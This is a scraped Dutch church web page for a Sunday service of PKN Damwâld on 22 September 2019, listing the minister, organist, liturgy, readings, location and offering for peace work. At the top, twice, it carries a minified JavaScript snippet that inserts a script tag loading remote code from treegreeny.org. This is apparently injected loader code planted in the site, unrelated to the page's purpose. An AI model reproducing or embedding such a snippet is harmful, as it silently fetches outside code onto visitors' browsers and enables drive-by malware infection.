;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Kerkdienst zondag 22 september 2019 9:30 uur - PKN Damwâld
zondag 22 september 2019
09:30 uur
Start KingKids !

Kerkdienst zondag 22 september 2019 9:30 uur

Informatie

Voorganger:Ds. G.J. Otter
Organist:Nienke v.d. Heide-Visser
Mededeling:Start KingKids !
Liturgie
Lied voor de dienst Elb 166 : 1 en 2
Welkom
Intochtslied Psalm 118 : 2 en 5
Stil Gebed, Votum en Groet
We zingen: Elb 479 : 1 en 2
Wetslezing .
We zingen: Psalm 65 : 1 en 2
Gebed
We lezen: Galaten 1 : 15 - 2 : 21
We zingen: Gezang 451 : 1 en 2
Preek .
We zingen: Psalm 138 : 4
Dankzegging en voorbede
Collecte
Slotlied : Gezang 470 : 1 en 3
Zegen
Liturgie met de liedteksten is alleen beschikbaar met een Mijn Kerk account. Inloggen
Locatie: Bonifatiuskerk Foarwei 2, Damwâld
Dienst terugluisteren Dienst terugluisteren
Collecte informatie
Eerste collecte: Vredeswerk

Vredeswerk - Als vrede ver te zoeken is
Op veel plaatsen in de wereld is vrede ver te zoeken. Vrede is meer dan de afwezigheid van oorlog. Het Bijbelse woord voor vrede, sjalom, verwijst naar heelheid, voorspoed en gezondheid. Als Protestantse Kerk willen we werken aan vrede. Door praktische hulp of een luisterend oor te bieden aan oorlogsslachtoffers. Door vredesprojecten in oorlogsgebieden te ondersteunen en door onrecht aan de kaak te stellen. In de Vredesweek vragen Kerk in Actie en PAX daar met klem aandacht en financiële steun voor. Collecteert u mee?

Tweede collecte: Kerk
Uitganscollecte: Bouwfonds